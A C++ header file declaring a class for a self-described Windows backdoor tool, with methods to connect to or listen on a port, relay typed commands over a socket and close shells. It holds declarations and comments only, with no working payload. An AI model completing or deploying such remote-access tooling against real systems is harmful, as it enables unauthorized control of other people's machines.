#ifndef _CnBackdoor_h_
#define _CnBackdoor_h_
#include "StdAfx.h"

/* class start */
class CHandleConnections;
class CNBACKDOOR
{
private:
	/* private functions */
	/*
		This handles the input of the user while receiving stuff from a connected socket.
		The function should be called as a new thread, else it will make the whole program
		freeze, waiting for user input to continue.

		Parameters:
		1. The void pointer to the socket ID
	*/
	static THREAD InputThread(void * s_socket);


	/* private variables */
	HANDLE h_input;			// stores thread handle of the input thread
	SOCKET c_socket;		// if connect option - socket ID
	SOCKET l_socket;		// if listen option - socket ID
	SOCKADDR_IN l_sockaddr; // sockaddr structure for the listening socket
	USERINFO* _users;

protected:
	fd_set fd_socks;
	int highest_sock;		// highest socket number in list
	int* user_slots;		// pointer to array of sockets list

	CHandleConnections *chandle_connections;

public:
	CNBACKDOOR();
	virtual ~CNBACKDOOR();

	/* functions */
	/*
		This is the main connect function. It connects to the given IP and Port, and returns 
		the socket ID if it could establish an connection. If it couldn't, return value is 0.
		Paramaters:
		1. IP to connect to;
		2. Port to connect to on the given IP;
	*/
	SOCKET ConnectTo(std::string IP, unsigned short port);

	/*
		After you are connected, you want to be able to receive and send commands.
		This is what you call after the connection is made. It will recv from the socket
		and show it to you when data is availlable. It also creates a thread to
		InputThread, with the given socket ID as parameter, to get user-input and send it
		to the socket. Only use this with ConnectTo(), not with Listen().
		Parameters:
		1. the socket ID to interact with;
		2. The IP for output information;
	*/
	void SendRecv(SOCKET sock, std::string IP);

	/*
		If the user wants us to 'listen' on a port for connections,
		we call this. Its parameters are set in main.
		Then we start listening and do as we are told :P
	*/
	bool Listen();

	/*
		'Exit' handler, when a user does ctrl+c for example.
		It closes the connection and shells.
		Parameters:
		1. close connection ?
		2. close listener ?
	*/
	void CtrlHandler(bool closeConnect, bool closeListener);

	/*
		Functions to return hardcoded variables;
		version number and author.
	*/
	std::string version() {return VERSION;}
	std::string author() {return AUTHOR;}


	/* variables */
	LOGINFO log_opt;			// log structure with log options
};

#endif							// ifndef _CnBackdoor_h_